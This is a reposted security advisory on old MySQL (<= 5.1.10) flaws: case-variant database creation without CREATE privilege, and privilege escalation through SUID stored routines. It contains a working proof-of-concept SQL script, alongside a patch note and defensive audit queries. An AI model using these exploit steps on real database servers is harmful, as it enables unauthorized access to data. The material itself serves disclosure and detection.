Discussion on MySQL permission escalation and security restrictions

Source: Internet
Author: User

This article describes MySQL privilege escalation and security restriction bypass vulnerabilities and how they work in practice. I came across this material on a related website a few days ago and thought it was good, so I am sharing it with you today.

Affected Systems:

MySQL AB MySQL <= 5.1.10

Description:

Bugtraq id: 19559

MySQL is a widely used open-source relational database system that runs on many platforms.

In MySQL, a user who has access privileges on a database but no CREATE privilege can create a new database whose name differs from the existing one only in letter case. Successful exploitation of this vulnerability requires that the file system hosting MySQL support case-sensitive file names.

In addition, because the arguments of suid routines are evaluated in the wrong security context, an attacker can execute arbitrary DML statements with the privileges of the routine definer through stored routines. A successful attack requires the EXECUTE privilege on the stored routine.

Test method:

Warning: The following procedures (methods) may be offensive and are intended only for security research and teaching. Use them at your own risk!

1. Create a database

    $ mysql -h my.mysql.server -u sample -p -A sample
    Enter password:
    Welcome to the MySQL monitor.  Commands end with ; or \g.
    Your MySQL connection id is 263935 to server version: 4.1.16-standard
    mysql> create database another;
    ERROR 1044: Access denied for user 'sample'@'%' to database 'another'
    mysql> create database sAmple;
    Query OK, 1 row affected (0.00 sec)

2. Privilege escalation

    --disable_warnings
    drop database if exists mysqltest1;
    drop database if exists mysqltest2;
    drop function if exists f_suid;
    --enable_warnings
    # Prepare playground
    create database mysqltest1;
    create database mysqltest2;
    create user malory@localhost;
    grant all privileges on mysqltest1.* to malory@localhost;
    # Create harmless (but SUID!) function
    create function f_suid(i int) returns int return 0;
    grant execute on function test.f_suid to malory@localhost;
    use mysqltest2;
    # Create table in which malory@localhost will be interested but to which
    # he won't have any access
    create table t1 (i int);
    # Connect as malory (empty password field) with mysqltest1 as default database
    connect (malcon, localhost, malory,,mysqltest1);
    # Correct: malory@localhost doesn't have access to mysqltest2.t1
    --error ER_TABLEACCESS_DENIED_ERROR
    select * from mysqltest2.t1;
    # Create function which will allow to exploit security hole
    delimiter |;
    create function f_edevil ()
      returns int
      sql security invoker
    begin
      set @a:= current_user();
      set @b:= (select count(*) from mysqltest2.t1);
      return 0;
    end|
    delimiter ;|
    # Again correct
    --error ER_TABLEACCESS_DENIED_ERROR
    select f_edevil();
    select @a, @b;
    # Oops!!! It seems that f_edevil() is executed in the context of the
    # f_suid() definer, so malory@localhost gets all info that he wants
    select test.f_suid(f_edevil());
    select @a, @b;
    connection default;
    drop user malory@localhost;
    drop database mysqltest1;
    drop database mysqltest2;

Suggestion:

Vendor patch: MySQL AB. The vendor has released an upgrade patch that fixes this security problem. Please download it from the vendor's homepage.
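An audit sketch for the two conditions described above, added here as an example and not part of the original advisory or any MySQL tooling. It assumes MySQL 5.0 or later (so that information_schema and mysql.procs_priv exist), an account allowed to read the mysql schema, and that "suid" routines are those created with SQL SECURITY DEFINER.

```sql
-- Added example: audit queries for the two issues in this advisory.

-- Context for issue 1: a value of 0 means database names are stored and
-- compared case-sensitively, which is the precondition the advisory names.
SHOW VARIABLES LIKE 'lower_case_table_names';

-- Issue 1: databases whose names differ only in letter case.
-- Any row returned is a pair (or more) such as 'sample' / 'sAmple'
-- that should be traced back to whoever created the newer variant.
SELECT LOWER(s.SCHEMA_NAME) AS folded_name,
       COUNT(*)             AS variants,
       GROUP_CONCAT(s.SCHEMA_NAME ORDER BY s.SCHEMA_NAME SEPARATOR ', ')
                            AS names_found
FROM   information_schema.SCHEMATA AS s
GROUP  BY LOWER(s.SCHEMA_NAME)
HAVING COUNT(*) > 1;

-- Issue 2: SQL SECURITY DEFINER routines on which an account other than
-- the definer holds a routine-level EXECUTE grant. On an unpatched server
-- each row is a routine through which the grantee could have expressions
-- evaluated with the definer's privileges.
-- Note: this covers only grants recorded in mysql.procs_priv; EXECUTE
-- granted globally or per database (mysql.user / mysql.db) is not listed.
SELECT r.ROUTINE_SCHEMA,
       r.ROUTINE_NAME,
       r.ROUTINE_TYPE,
       r.DEFINER,
       CONCAT(p.User, '@', p.Host) AS grantee
FROM   information_schema.ROUTINES AS r
JOIN   mysql.procs_priv AS p
       ON  p.Db           = r.ROUTINE_SCHEMA
       AND p.Routine_name = r.ROUTINE_NAME
       AND p.Routine_type = r.ROUTINE_TYPE
WHERE  r.SECURITY_TYPE = 'DEFINER'
  AND  FIND_IN_SET('Execute', p.Proc_priv) > 0
  AND  CONCAT(p.User, '@', p.Host) <> r.DEFINER
ORDER  BY r.ROUTINE_SCHEMA, r.ROUTINE_NAME, grantee;
```

Rows from the second query are review candidates rather than findings: a DEFINER routine with EXECUTE granted to another account is normal usage, and it only becomes a concern on a server that has not yet received the vendor patch.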
